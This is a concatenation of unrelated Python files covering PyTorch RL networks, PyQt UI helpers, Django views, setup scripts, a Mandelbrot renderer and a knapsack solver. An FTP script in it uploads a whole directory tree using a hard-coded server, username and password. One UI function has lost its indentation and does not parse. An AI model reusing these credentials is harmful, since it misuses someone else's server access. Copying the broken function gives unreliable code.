        self.sigmoid = nn.Softplus()  # name kept for checkpoint compat; it is a Softplus
        nn.init.kaiming_normal_(self.fc1.weight.data)
        nn.init.xavier_normal_(self.fc_mean.weight.data)
        nn.init.xavier_normal_(self.fc_std.weight.data)

    def forward(self, x):
        """Return (mean, std) of the rotation distribution for states *x*."""
        hidden = self.relu1(self.fc1(x))
        mean = self.tanh(self.fc_mean(hidden))
        std = self.sigmoid(self.fc_std(hidden)) + 1e-5  # keep std > 0
        return mean, std

    def choose_action(self, state):
        """Sample a rotation from N(mean, std) as a numpy array."""
        mean, std = self.forward(state)
        return Normal(mean, std).sample().numpy()
class MLPRotationValue(nn.Module):
    """Value head for the rotation policy (same layout as MLPValue)."""

    def __init__(self, state_dim):
        super(MLPRotationValue, self).__init__()
        self.fc1 = nn.Linear(state_dim, 100)
        self.relu = nn.ReLU()
        self.fc2 = nn.Linear(100, 1)
        self.tanh = nn.Tanh()  # unused in forward; kept for state_dict compat
        nn.init.kaiming_normal_(self.fc1.weight.data)
        nn.init.xavier_normal_(self.fc2.weight.data)

    def forward(self, x):
        """Return the scalar value estimate per state row."""
        return self.fc2(self.relu(self.fc1(x)))
class CNNPolicy(nn.Module):
    """CNN Gaussian policy over a 224x224 single-channel image plus a 2-d
    position vector.

    The conv trunk maps (N, 1, 224, 224) -> 1024-d (fc1) -> 64-d (fc2)
    features; the position is concatenated before the mean/std heads.
    """

    def __init__(self, action_dim):
        super(CNNPolicy, self).__init__()
        self.conv1 = nn.Conv2d(1, 32, kernel_size=6, stride=2)  # 224*224*1 -> 110*110*32
        self.relu1 = nn.ReLU()
        self.maxpool = nn.MaxPool2d(kernel_size=2)  # 110*110*32 -> 55*55*32
        self.conv2 = nn.Conv2d(32, 64, kernel_size=3, stride=1, padding=1)  # -> 55*55*64
        self.relu2 = nn.ReLU()
        self.conv3 = nn.Conv2d(64, 64, kernel_size=5, stride=2)  # -> 26*26*64
        self.relu3 = nn.ReLU()
        self.fc1 = nn.Linear(26 * 26 * 64, 1024)
        self.relu4 = nn.ReLU()
        self.fc2 = nn.Linear(1024, 64)
        self.relu5 = nn.ReLU()
        self.fc_mean = nn.Linear(64 + 2, action_dim)  # +2 for the 2-d position input
        self.tanh = nn.Tanh()
        self.fc_std = nn.Linear(64 + 2, action_dim)
        self.sigmoid = nn.Softplus()  # name kept for checkpoint compat; it is a Softplus
        nn.init.kaiming_normal_(self.conv1.weight.data)
        nn.init.kaiming_normal_(self.conv2.weight.data)
        nn.init.kaiming_normal_(self.conv3.weight.data)
        nn.init.kaiming_normal_(self.fc1.weight.data)
        nn.init.kaiming_normal_(self.fc2.weight.data)
        nn.init.xavier_normal_(self.fc_mean.weight.data)
        nn.init.xavier_normal_(self.fc_std.weight.data)

    def _fc1_features(self, x):
        """Shared conv trunk up to the (pre-ReLU) 1024-d fc1 output."""
        x = self.relu1(self.conv1(x))
        x = self.maxpool(x)
        x = self.relu2(self.conv2(x))
        x = self.relu3(self.conv3(x))
        return self.fc1(x.view(x.size(0), -1))

    def forward(self, x, position):
        """Return (mean, std) given image batch *x* and (N, 2) *position*."""
        h = self.relu4(self._fc1_features(x))
        h = self.relu5(self.fc2(h))
        h = torch.cat((h, position), 1)
        mean = self.tanh(self.fc_mean(h))
        std = self.sigmoid(self.fc_std(h)) + 1e-5  # keep std > 0
        return mean, std

    def choose_action(self, state, position=None):
        """Sample an action from N(mean, std) as a numpy array.

        Bug fix: this used to call self.forward(state) even though forward
        requires (x, position), so it always raised TypeError. `position`
        is now accepted (optional to keep the old signature callable) and
        forwarded; it is required in practice.
        """
        mean, std = self.forward(state, position)
        return Normal(mean, std).sample().numpy()

    def get_feature64(self, x):
        """Return the 64-d fc2 features (no grad, no final ReLU)."""
        with torch.no_grad():
            return self.fc2(self.relu4(self._fc1_features(x)))

    def get_feature1024(self, x):
        """Return the 1024-d fc1 features (no grad, pre-ReLU)."""
        with torch.no_grad():
            return self._fc1_features(x)
class CNNRotationSup224(nn.Module):
    """Supervised rotation regressor for 224x224 single-channel images.

    Outputs a tanh-bounded angle scaled to [-pi, pi].
    """

    def __init__(self, action_dim=1):
        super(CNNRotationSup224, self).__init__()
        self.conv1 = nn.Conv2d(1, 32, kernel_size=6, stride=2)  # 224*224*1 -> 110*110*32
        self.relu1 = nn.ReLU()
        self.maxpool = nn.MaxPool2d(kernel_size=2)  # 110*110*32 -> 55*55*32
        self.conv2 = nn.Conv2d(32, 64, kernel_size=3, stride=1, padding=1)  # -> 55*55*64
        self.relu2 = nn.ReLU()
        self.conv2_2 = nn.Conv2d(64, 64, kernel_size=3, stride=1, padding=1)  # -> 55*55*64
        self.relu2_2 = nn.ReLU()
        self.conv3 = nn.Conv2d(64, 64, kernel_size=5, stride=2)  # -> 26*26*64
        self.relu3 = nn.ReLU()
        self.fc1 = nn.Linear(26 * 26 * 64, 1024)
        self.relu4 = nn.ReLU()
        self.fc2 = nn.Linear(1024, 64)
        self.relu5 = nn.ReLU()
        self.fc_mean = nn.Linear(64, action_dim)
        self.tanh = nn.Tanh()
        nn.init.xavier_normal_(self.conv1.weight.data)
        nn.init.xavier_normal_(self.conv2.weight.data)
        nn.init.xavier_normal_(self.conv2_2.weight.data)
        nn.init.xavier_normal_(self.conv3.weight.data)
        nn.init.xavier_normal_(self.fc1.weight.data)
        nn.init.xavier_normal_(self.fc2.weight.data)
        nn.init.xavier_normal_(self.fc_mean.weight.data)
        nn.init.zeros_(self.conv1.bias)
        nn.init.zeros_(self.conv2.bias)
        nn.init.zeros_(self.conv2_2.bias)
        nn.init.zeros_(self.conv3.bias)
        nn.init.zeros_(self.fc1.bias)
        nn.init.zeros_(self.fc2.bias)
        nn.init.zeros_(self.fc_mean.bias)

    def forward(self, x):
        """Return the predicted rotation angle in [-pi, pi], shape (N, 1).

        Bug fix: the conv2_2 result used to be assigned to `X` (capital)
        and discarded, so the layer's output never entered the forward
        pass even though its parameters were trained. It is now applied.
        """
        x = self.relu1(self.conv1(x))
        x = self.maxpool(x)
        x = self.relu2(self.conv2(x))
        x = self.relu2_2(self.conv2_2(x))
        x = self.relu3(self.conv3(x))
        x = self.relu4(self.fc1(x.view(x.size(0), -1)))
        x = self.relu5(self.fc2(x))
        mean = self.tanh(self.fc_mean(x))
        # Scale the tanh output from [-1, 1] to radians in [-pi, pi].
        return mean * np.pi

    def get_feature(self):
        # Placeholder kept for interface compatibility.
        pass
class MLPPolicy64(nn.Module):
    """Gaussian policy over a 64-d feature vector concatenated with a 2-d
    position vector."""

    def __init__(self, state_dim=64, action_dim=2):
        super(MLPPolicy64, self).__init__()
        self.fc1 = nn.Linear(state_dim + 2, 100)  # +2 for the position input
        self.relu1 = nn.ReLU()
        self.fc_mean = nn.Linear(100, action_dim)
        self.tanh = nn.Tanh()
        self.fc_std = nn.Linear(100, action_dim)
        self.sigmoid = nn.Softplus()  # name kept for checkpoint compat; it is a Softplus
        nn.init.kaiming_normal_(self.fc1.weight.data)
        nn.init.xavier_normal_(self.fc_mean.weight.data)
        nn.init.xavier_normal_(self.fc_std.weight.data)

    def forward(self, x, pos):
        """Return (mean, std) given (N, 64) features and (N, 2) positions."""
        h = torch.cat((x, pos), 1)
        h = self.relu1(self.fc1(h))
        mean = self.tanh(self.fc_mean(h))
        std = self.sigmoid(self.fc_std(h)) + 1e-5  # keep std > 0
        return mean, std

    def choose_action(self, state, pos=None):
        """Sample an action from N(mean, std) as a numpy array.

        Bug fix: this used to call self.forward(state) even though forward
        requires (x, pos), so it always raised TypeError. `pos` is now
        accepted (optional to keep the old signature callable) and
        forwarded; it is required in practice.
        """
        mean, std = self.forward(state, pos)
        return Normal(mean, std).sample().numpy()
class MLPValue64(nn.Module):
    """Value head over 64-d features concatenated with a 2-d position."""

    def __init__(self, state_dim=64):
        super(MLPValue64, self).__init__()
        self.fc1 = nn.Linear(state_dim + 2, 100)  # +2 for the position input
        self.relu = nn.ReLU()
        self.fc2 = nn.Linear(100, 1)
        self.tanh = nn.Tanh()  # unused in forward; kept for state_dict compat
        nn.init.kaiming_normal_(self.fc1.weight.data)
        nn.init.xavier_normal_(self.fc2.weight.data)

    def forward(self, x, pos):
        """Return the scalar value estimate per (features, position) row."""
        joined = torch.cat((x, pos), 1)
        return self.fc2(self.relu(self.fc1(joined)))
class MLPPolicy1024(nn.Module):
    """Gaussian policy over a 1024-d feature vector concatenated with a
    2-d position vector."""

    def __init__(self, state_dim=1024, action_dim=2):
        super(MLPPolicy1024, self).__init__()
        self.fc1 = nn.Linear(state_dim + 2, 100)  # +2 for the position input
        self.relu1 = nn.ReLU()
        self.fc_mean = nn.Linear(100, action_dim)
        self.tanh = nn.Tanh()
        self.fc_std = nn.Linear(100, action_dim)
        self.sigmoid = nn.Softplus()  # name kept for checkpoint compat; it is a Softplus
        nn.init.kaiming_normal_(self.fc1.weight.data)
        nn.init.xavier_normal_(self.fc_mean.weight.data)
        nn.init.xavier_normal_(self.fc_std.weight.data)

    def forward(self, x, pos):
        """Return (mean, std) given (N, 1024) features and (N, 2) positions."""
        h = torch.cat((x, pos), 1)
        h = self.relu1(self.fc1(h))
        mean = self.tanh(self.fc_mean(h))
        std = self.sigmoid(self.fc_std(h)) + 1e-5  # keep std > 0
        return mean, std

    def choose_action(self, state, pos=None):
        """Sample an action from N(mean, std) as a numpy array.

        Bug fix: this used to call self.forward(state) even though forward
        requires (x, pos), so it always raised TypeError. `pos` is now
        accepted (optional to keep the old signature callable) and
        forwarded; it is required in practice.
        """
        mean, std = self.forward(state, pos)
        return Normal(mean, std).sample().numpy()
class MLPValue1024(nn.Module):
    """Value head over 1024-d features concatenated with a 2-d position."""

    def __init__(self, state_dim=1024):
        super(MLPValue1024, self).__init__()
        self.fc1 = nn.Linear(state_dim + 2, 100)  # +2 for the position input
        self.relu = nn.ReLU()
        self.fc2 = nn.Linear(100, 1)
        self.tanh = nn.Tanh()  # unused in forward; kept for state_dict compat
        nn.init.kaiming_normal_(self.fc1.weight.data)
        nn.init.xavier_normal_(self.fc2.weight.data)

    def forward(self, x, pos):
        """Return the scalar value estimate per (features, position) row."""
        joined = torch.cat((x, pos), 1)
        return self.fc2(self.relu(self.fc1(joined)))
|
def interface_error_msg(interface, error_msg="Erro: Desconhecido"):
    """Show *error_msg* in the UI error label (default: "unknown error")."""
    interface.label_erro.setText(error_msg)


def interface_status_msg(interface, status_msg="Desconhecido"):
    """Show *status_msg* in the UI status label (default: "unknown")."""
    interface.label_status.setText(status_msg)
def interface_scan_start(interface):
    """Lock the controls while a scan runs; only the stop button stays on."""
    interface.botao_vai.setEnabled(False)        # "go" button
    interface.botao_parar.setEnabled(True)       # "stop" button
    interface.botao_instrumento.setEnabled(False)
    interface.box_nome.setEnabled(False)
    interface.botao_salvar.setEnabled(False)
    ###
    interface_error_msg(interface," ")
    interface_status_msg(interface,"Iniciando...")  # "Starting..."
def get_commander_port(interface):
    """Extract the serial-port resource name from the controller combobox.

    The resource follows the pattern COM<d> where <d> is a digit sequence.
    Raises AttributeError (on None.group) when no COM token is present,
    matching the original behavior.
    """
    import re
    selected = interface.box_controlador.currentText()
    return re.search(r'(COM\d*)', selected).group(0)
def interface_matrix_start(interface):
interface.botao_vai.setEnabled(False)
interface.botao_parar.setEnabled(False)
interface.botao_instrumento.setEnabled(False)
interface.box_nome.setEnabled(False)
interface.botao_salvar.setEnabled(False)
interface.box_config.setEnabled(False)
###
interface_error_msg(interface," ")
interface_status_msg(interface,"Programando...")
def interface_matrix_end(interface):
    """Restore the UI after matrix programming; the stop button stays off."""
    for widget_name in ("botao_vai", "botao_instrumento", "box_nome",
                        "botao_salvar", "box_config"):
        getattr(interface, widget_name).setEnabled(True)
    interface.botao_parar.setEnabled(False)
    interface_error_msg(interface, " ")
    interface_status_msg(interface, "Esperando")
def interface_scan_finished(interface):
    """Suggest a fresh output file name and unlock the controls after a scan."""
    interface_update_filename(interface)
    for widget_name in ("botao_vai", "botao_instrumento", "box_nome", "botao_salvar"):
        getattr(interface, widget_name).setEnabled(True)
    interface.botao_parar.setEnabled(False)
def get_unit(interface):
    """Return the Hz multiplier for the unit selected in the combo box."""
    scale = {"kHz": 10 ** 3,
             "MHz": 10 ** 6,
             "GHz": 10 ** 9}
    return scale[str(interface.box_frequencia_unidade.currentText())]
def get_frequency(interface):
    """Return the configured frequency converted to Hz."""
    return interface.box_frequencia.value() * get_unit(interface)
def interface_update_filename(interface):
    """Fill the file-name box with a timestamped default ("arquivo_<stamp>")."""
    import datetime
    stamp = datetime.datetime.now().strftime("%d-%m-%Y %H-%M-%S")
    interface.box_nome.setText("arquivo_" + stamp)
def get_X(interface):
    # Scan size along X, read from the dimension spin box.
    return interface.box_dimensao_X.value()
def get_Y(interface):
    # Scan size along Y, read from the dimension spin box.
    return interface.box_dimensao_Y.value()
def get_filename(interface):
    # Current contents of the output file-name box.
    return interface.box_nome.text()
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse
from .models import blog, Author, Category
from .forms import PostForm, SignUpForm
from django.shortcuts import redirect
from django.utils import timezone
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.contrib.auth import login, authenticate, logout
def index(request):
    """Render the landing page with blog/author counts and full listings."""
    blogs = blog.objects.all()
    authors = Author.objects.all()
    context = {
        'num_blog': blogs.count(),
        'num_authors': authors.count(),
        'blogs': blogs,
        'authors': authors,
    }
    return render(request, 'index.html', context)
def detail(request, blog_id):
    """Render the detail page for a single blog post; 404 if it doesn't exist."""
    thisblog = get_object_or_404(blog, pk=blog_id)
    return render(request, 'details.html', {'blog':thisblog})
@login_required
def newblog(request):
    """Create a new blog post for the logged-in user.

    GET renders an empty form; POST validates, stamps the publish time,
    attaches the author and redirects home. An invalid POST re-renders
    the bound form with its errors.
    """
    form = PostForm(request.POST) if request.method == "POST" else PostForm()
    if request.method == "POST" and form.is_valid():
        post = form.save(commit=False)
        post.published = timezone.now()
        post.author = Author.objects.get(pk=request.user.pk)
        post.save()
        return redirect('index')
    return render(request, 'newblog.html', {'form': form})
def SignUp(request):
    """Register a new user, create the matching Author profile, log the
    user in and redirect home.  GET renders an empty signup form."""
    if request.method == 'POST':
        form = SignUpForm(request.POST)
        if form.is_valid():
            form.save()
            username = form.cleaned_data.get('username')
            password = form.cleaned_data.get('password1')
            first_name = form.cleaned_data.get('first_name')
            last_name = form.cleaned_data.get('last_name')
            date_of_birth = form.cleaned_data.get('date_of_birth')
            # NOTE(review): authenticate() can return None (e.g. inactive
            # user); Author.objects.create(user=None, ...) and login(request,
            # None) would then fail -- confirm this path cannot occur.
            user = authenticate(username=username, password=password)
            author = Author.objects.create(user=user, first_name=first_name, last_name=last_name, date_of_birth=date_of_birth)
            login(request, user)
            return redirect('index')
    else:
        form = SignUpForm()
    return render(request, 'signup.html', {'form':form})
@login_required
def LogOut(request):
    """Log the current user out and return to the index page."""
    logout(request)
    return redirect('index')
def profile(request, username):
    """Render an author's profile page together with all of their posts.

    404s when no Author matches the given username.
    """
    author = get_object_or_404(Author, user__username=username)
    # Posts written by this user (blog.author -> Author.user FK chain);
    # the redundant .all() and the leftover debug print() were removed.
    blogs = blog.objects.filter(author__user__username=username)
    return render(request, 'profile.html', {'author': author, 'blogs': blogs})
|
from setuptools import setup, find_packages

# Long description comes from the README shipped alongside setup.py.
with open('README.md', encoding='utf-8') as f:
    readme = f.read()

setup(
    name='game-of-life',
    version='0.1.0',
    description='Sample Game of Life',
    long_description=readme,
    author='mpoqq',
    author_email='matthias.poqq@gmail.com',
    # BUGFIX: the original passed `license=license`, i.e. the site *builtin*
    # `license` helper object, not a license string. Replace 'UNKNOWN' with
    # the project's real license identifier.
    license='UNKNOWN',
    # BUGFIX: `exclude` must be an iterable of patterns; a bare string is
    # iterated character by character and excludes nothing useful.
    packages=find_packages(exclude=('examples', 'examples.*')),
)
|
#!/usr/bin/env python
"""Mandelbrot set renderer.
@author: Stephan Wenger
@date: 2012-03-23
"""
from numpy import linspace, array, minimum, maximum, cos, pi
from matplotlib import cm
from glitter import ShaderProgram, get_fullscreen_quad, Texture1D
from glitter.contexts.glut import GlutWindow, main_loop, get_elapsed_time
from glitter.raw import glut
vertex_shader = """
#version 400 core
layout(location=0) in vec4 in_position;
uniform vec2 minval, maxval;
out vec2 ex_texcoord;
void main() {
gl_Position = in_position;
ex_texcoord = (in_position.xy * 0.5 + 0.5) * (maxval - minval) + minval;
}
"""
fragment_shader = """
#version 400 core
#extension GL_ARB_texture_rectangle : enable
in vec2 ex_texcoord;
uniform sampler1D colormap;
layout(location=0) out vec4 out_color;
const int max_iteration = 1000;
void main() {
vec2 xy = vec2(0.0, 0.0);
int iteration = 0;
while (xy.x * xy.x + xy.y * xy.y < 4 && iteration < max_iteration) {
xy = vec2(xy.x * xy.x - xy.y * xy.y + ex_texcoord.x, 2 * xy.x * xy.y + ex_texcoord.y);
iteration++;
}
float c = iteration - log(log(length(xy)));
out_color = texture(colormap, 0.1 * c);
}
"""
class MandelbrotRenderer(object):
    """Interactive GLUT Mandelbrot viewer.

    Left-drag selects a rectangle to zoom into (with an animated
    transition); right-click zooms back out to the previous view.
    """

    transition_time = 0.3 # seconds
    update_step = 10 # milliseconds

    def __init__(self):
        self.window = GlutWindow(double=True, multisample=True)
        self.window.display_callback = self.display
        self.window.mouse_callback = self.mouse
        self.shader = ShaderProgram(vertex=vertex_shader, fragment=fragment_shader)
        self.shader.colormap = Texture1D(cm.spectral(linspace(0, 1, 256)), wrap_s="MIRRORED_REPEAT")
        self.shader.minval = (-2.5, -1.75)
        self.shader.maxval = (1.0, 1.75)
        self.vao = get_fullscreen_quad()
        self.history = []  # stack of previous (minval, maxval) view windows

    def display(self):
        self.window.clear()
        self.vao.draw()
        self.window.swap_buffers()

    def timer(self):
        """Advance the zoom animation by one step, rescheduling while active."""
        t = min(1.0, (get_elapsed_time() - self.transition_start) / self.transition_time)
        x = 0.5 - 0.5 * cos(pi * t)  # cosine ease-in/ease-out
        self.shader.minval = self.minstart * (1 - x) + self.minend * x
        self.shader.maxval = self.maxstart * (1 - x) + self.maxend * x
        if t < 1:
            self.window.add_timer(self.update_step, self.timer)
        self.window.post_redisplay()

    def start_transition(self, minval, maxval):
        """Animate the view window from the current bounds to (minval, maxval)."""
        self.minstart, self.maxstart = self.shader.minval, self.shader.maxval
        self.minend, self.maxend = minval, maxval
        self.transition_start = get_elapsed_time()
        self.timer()

    def mouse(self, button, state, x, y):
        """GLUT mouse handler: left-drag zooms in, right-click zooms out."""
        if button == glut.GLUT_LEFT_BUTTON:
            # Convert window pixels to complex-plane coordinates (y flipped).
            pos = array((x, self.window.shape[0] - y)) / array(self.window.shape[::-1], dtype=float)
            pos = pos * (self.shader.maxval - self.shader.minval) + self.shader.minval
            if state == glut.GLUT_DOWN:
                self.last_pos = pos
            elif state == glut.GLUT_UP and all(pos != self.last_pos):
                self.history.append((self.shader.minval, self.shader.maxval))
                self.start_transition(minimum(pos, self.last_pos), maximum(pos, self.last_pos))
        elif button == glut.GLUT_RIGHT_BUTTON and state == glut.GLUT_DOWN:
            # BUGFIX: this branch was an `elif` nested inside the left-button
            # block, so `button == GLUT_RIGHT_BUTTON` could never be true and
            # zoom-out was dead code. It is now a proper top-level branch.
            if self.history:
                self.start_transition(*self.history.pop())

    def run(self):
        with self.shader:
            main_loop()
if __name__ == "__main__":
    MandelbrotRenderer().run()  # blocks inside the GLUT main loop
|
#!/usr/bin/python
# Wire two emulated power supplies to a PTY interface and start serving.
import PTY_Interface
import PowerSupply
pty = PTY_Interface.Interface()
# presumably the second argument is a device address/slot -- TODO confirm
pty.addDevice(PowerSupply.PowerSupply(), 5)
pty.addDevice(PowerSupply.E3631A(), 3)
pty.printFilename()
pty.run()
|
import sys
import timeseries.ArrayTimeSeries as ts
import simsearch.SimilaritySearch as ss
import numpy as np
import simsearch.database as rbtreeDB
from storagemanager.FileStorageManager import FileStorageManager
def load_ts_data(file_name):
    """Load timeseries data from a space-delimited file.

    Column 0 holds the times, column 1 the values; returns an
    ArrayTimeSeries built as (values, times).
    """
    raw = np.loadtxt(file_name, delimiter=' ')
    return ts.ArrayTimeSeries(raw[:, 1], raw[:, 0])
def max_similarity_search(input_ts):
    """
    Find the vantage point closest to the target timeseries.

    Scans the 20 vantage-point databases and returns the tuple
    (minimum distance, vantage DB name, timeseries id).
    """
    fsm = FileStorageManager()
    std_comp_ts = ss.standardize(input_ts)
    min_dis = float('inf')
    min_db_name = ""
    # Initialized up front: previously min_ts_id stayed unbound (NameError on
    # return) if no vantage point ever beat the initial infinity, and an
    # unused min_ts_file_name variable shadowed the real return value.
    min_ts_id = None
    for i in range(20):
        db_name = "vpDB/db_" + str(i) + ".dbdb"
        db = rbtreeDB.connect(db_name)
        ts_id = db.get(0)
        std_vp_ts = ss.standardize(fsm.get(ts_id))
        curr_dis = ss.kernel_dis(std_vp_ts, std_comp_ts)
        if curr_dis < min_dis:
            min_dis = curr_dis
            min_db_name = db_name
            min_ts_id = ts_id
    return min_dis, min_db_name, min_ts_id
def kth_similarity_search(input_ts, min_dis, min_db_name, k=1):
    """
    Find the k most similar timeseries inside the chosen vantage DB.

    Returns a list of (distance, ts_id) tuples sorted by ascending
    distance, at most k entries long.
    """
    fsm = FileStorageManager()
    db = rbtreeDB.connect(min_db_name)
    _, ts_ids = db.get_smaller_nodes(2.0 * min_dis)
    candidates = [
        (ss.kernel_dis(ss.standardize(fsm.get(ts_id)), input_ts), ts_id)
        for ts_id in ts_ids
    ]
    candidates.sort(key=lambda pair: pair[0])
    # Slicing also covers the case where fewer than k candidates exist.
    return candidates[:k]
def find_kth_similarity(input_file_name, k):
    """
    Main entry point: print the k closest timeseries to the input file.

    :param input_file_name: input TS file name to be compared
    :param k: number of closest matches to report
    """
    target = load_ts_data(input_file_name)
    min_dis, min_db_name, _ = max_similarity_search(target)
    matches = kth_similarity_search(target, min_dis, min_db_name, k)
    print("The %dth closest TimeSeries data of %s is:" % (k, input_file_name))
    for rank, match in enumerate(matches, start=1):
        print("No.%d %s" % (rank, match[1]))
if __name__ == "__main__":
    # CLI usage: python <script> <timeseries file> <k>
    input_file_name = sys.argv[1]
    k = int(sys.argv[2])
    find_kth_similarity(input_file_name, k)
|
from django.views.generic.list import ListView
from django.views.generic.detail import DetailView
from django.views.generic import CreateView, UpdateView, DeleteView
from django.urls import reverse_lazy
from .models import Department
from .form import DepartmentForm
from django.shortcuts import redirect
from django.contrib.admin.views.decorators import staff_member_required
from django.utils.decorators import method_decorator
class StaffRequiredMixin(object):
    """
    Mixin that requires the requesting user to be a staff member.

    NOTE(review): the views below apply method_decorator on the class
    directly, so this mixin appears unused in this module.
    """
    @method_decorator(staff_member_required)
    def dispatch(self, request, *args, **kwargs):
        return super(StaffRequiredMixin, self).dispatch(request, *args, **kwargs)
class DepartmentListView(ListView):
    """Public listing of all Department objects."""
    model = Department
class DepartmentsDetailView(DetailView):
    """Public detail page for a single Department."""
    model = Department
@method_decorator(staff_member_required, name="dispatch")
class DepartmentCreateView(CreateView):
    """Staff-only creation form for departments."""
    model = Department
    form_class = DepartmentForm
    success_url = reverse_lazy('departments:departments')
@method_decorator(staff_member_required, name="dispatch")
class DepartmentUpdateView(UpdateView):
    """Staff-only edit form; redirects back to itself with '?ok' on success."""
    model = Department
    form_class = DepartmentForm
    template_name_suffix = '_update_form'
    def get_success_url(self):
        # '?ok' flags a successful save so the template can show a notice.
        return reverse_lazy('departments:update', args=[self.object.id]) + '?ok'
@method_decorator(staff_member_required, name="dispatch")
class DepartmentDeleteView(DeleteView):
    """Staff-only delete confirmation; returns to the list afterwards."""
    model = Department
    success_url = reverse_lazy('departments:departments')
|
from ftplib import FTP
import os
# FTP server settings.
# NOTE(review): credentials are hard-coded in source -- move them to
# environment variables or a config file before sharing/deploying.
host = 'office.ai4health.com'
port = 8021
username = 'zjjm'
password = 'ftp_123_zjjm'
def ftpconnect(host, port, username, password):
    """Open an FTP connection, log in, and return the connected client."""
    client = FTP()
    # client.set_debuglevel(2)
    client.connect(host, port)
    client.login(username, password)
    return client
def downloadfile(ftp, remotepath, localpath):
    """Download remotepath from the FTP server into localpath (binary mode)."""
    bufsize = 1024
    # `with` guarantees the local file is closed even if the transfer fails
    # (the original leaked the handle on any exception in retrbinary).
    with open(localpath, 'wb') as fp:
        ftp.retrbinary('RETR ' + remotepath, fp.write, bufsize)
    ftp.set_debuglevel(0)
def uploadfile(ftp, remotepath, localpath):
    """Upload localpath to remotepath on the FTP server (binary mode)."""
    bufsize = 1024
    # `with` guarantees the local file is closed even if the transfer fails
    # (the original leaked the handle on any exception in storbinary).
    with open(localpath, 'rb') as fp:
        ftp.storbinary('STOR ' + remotepath, fp, bufsize)
    ftp.set_debuglevel(0)
if __name__ == "__main__":
    # Upload the current directory tree to /qwj/arburg/test on the server.
    ftp = ftpconnect(host, port, username, password)
    for root, dirs, files in os.walk('./'):
        for file1 in files:
            file_name = os.path.join(root, file1)
            print(file_name)
            # file_name[2:] strips the leading './' produced by os.walk
            uploadfile(ftp, os.path.join("/qwj/arburg/test", file_name[2:]), file_name)
    ftp.quit()
|
# 0/1 knapsack problem ("Boj: ordinary knapsack")
"""
dynamic programming
- build a 2-D dp table over (items, capacity)
- recurrence: dp[i][j] = max(dp[i - 1][j], dp[i - 1][j - weight[i]] + value[i]) if j - weight[i] >= 0 else dp[i][j] = dp[i - 1][j]
"""
import sys
# BUGFIX: raw string for the Windows path -- the plain literal relied on
# '\g', '\A', '\D', '\i' not being recognized escapes, which raises
# SyntaxWarning (and will eventually be an error) on modern Python.
sys.stdin = open(r'C:\github\Algorithm\Dynamic-Programming\input.txt', 'rt')
# input = sys.stdin.readline
n, k = map(int, input().split())
dp = [[0] * (k + 1) for _ in range(n + 1)]
weight = [0]  # 1-indexed item weights (index 0 unused)
value = [0]   # 1-indexed item values (index 0 unused)
for _ in range(n):
    w, v = map(int, input().split())
    weight.append(w)
    value.append(v)
for i in range(1, n + 1):
    for j in range(1, k + 1):
        if j - weight[i] >= 0:
            # Either skip item i, or take it on top of the best for j - weight[i].
            dp[i][j] = max(dp[i - 1][j], dp[i - 1][j - weight[i]] + value[i])
        else:
            dp[i][j] = dp[i - 1][j]
print(dp[n][k])
|
import abc
from typing import Dict, List
from job_search.domain.jobs.value_objects.job_type import JobInfo
from job_search.domain.jobs.value_objects.simple_objects import ContactInfo, LocationInfo
import job_search.repository.jobs.entities.job_entity as entities
class JobRepository(metaclass=abc.ABCMeta):
    """Abstract persistence interface for job postings.

    Concrete implementations persist/load JobInfo aggregates and resolve
    the individual value objects to their backing entities.
    """

    @abc.abstractmethod
    def persist(self, job: JobInfo) -> None:
        raise NotImplementedError('persist is not implemented')

    @abc.abstractmethod
    def load(self, job_id: str) -> JobInfo:
        raise NotImplementedError('load is not implemented')

    @abc.abstractmethod
    def load_all_jobs(self) -> List[JobInfo]:
        raise NotImplementedError('load is not implemented')

    @abc.abstractmethod
    def find_title(self, title: str) -> entities.TitleEntity:
        raise NotImplementedError('find_title is not implemented')

    @abc.abstractmethod
    def find_company(self, company: str) -> entities.CompanyEntity:
        raise NotImplementedError('find_company is not implemented')

    @abc.abstractmethod
    def find_location(self, location: LocationInfo) -> entities.LocationEntity:
        raise NotImplementedError('find_location is not implemented')

    @abc.abstractmethod
    def find_city(self, city: str) -> entities.CityEntity:
        raise NotImplementedError('find_city is not implemented')

    @abc.abstractmethod
    def find_state(self, state: str) -> entities.StateEntity:
        raise NotImplementedError('find_state is not implemented')

    @abc.abstractmethod
    def find_country(self, country: str) -> entities.CountryEntity:
        raise NotImplementedError('find_country is not implemented')

    @abc.abstractmethod
    def find_contact_info(self, info: ContactInfo) -> entities.ContactInfoEntity:
        raise NotImplementedError('find_contact_info is not implemented')

    @abc.abstractmethod
    def find_contact_name(self, name: str) -> entities.ContactNameEntity:
        raise NotImplementedError('find_contact_name is not implemented')

    @abc.abstractmethod
    def find_contact_email(self, email: str) -> entities.ContactEmailEntity:
        raise NotImplementedError('find_contact_email is not implemented')

    @abc.abstractmethod
    def find_contact_website(self, website: str) -> entities.ContactWebsiteEntity:
        raise NotImplementedError('find_contact_website is not implemented')

    @abc.abstractmethod
    def find_restrictions(self, restrictions: List[str]) -> Dict:
        raise NotImplementedError('find_restrictions is not implemented')

    @abc.abstractmethod
    def find_requirements(self, requirements: List[str]) -> Dict:
        # BUGFIX: message previously read "impemented".
        raise NotImplementedError('find_requirements is not implemented')

    @abc.abstractmethod
    def find_source(self, source: str) -> entities.SourceEntity:
        raise NotImplementedError('find_source is not implemented')
|
from setuptools import setup
from tumblr_reader import __version__

# Read the long description up front so the file handle is closed before
# setup() runs (the original open() inside the call was never closed and
# used the platform default encoding).
with open('README.rst', encoding='utf-8') as f:
    long_description = f.read()

setup(
    name='django-tumblr-reader',
    version=__version__,
    author='Zach Snow',
    author_email='z@zachsnow.com',
    packages=['tumblr_reader', 'tumblr_reader.templatetags'],
    include_package_data=True,
    url='http://zachsnow.com/projects/',
    license='LICENSE.rst',
    description=r"""django-tumblr-reader is a simple, reusable Django application that defines template tags for embedding your Tumblr blog in your Django website.""",
    long_description=long_description,
)
|
# Copyright (c) 2011 Alun Morgan, Michael Abbott, Diamond Light Source Ltd.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# Contact:
# Diamond Light Source Ltd,
# Diamond House,
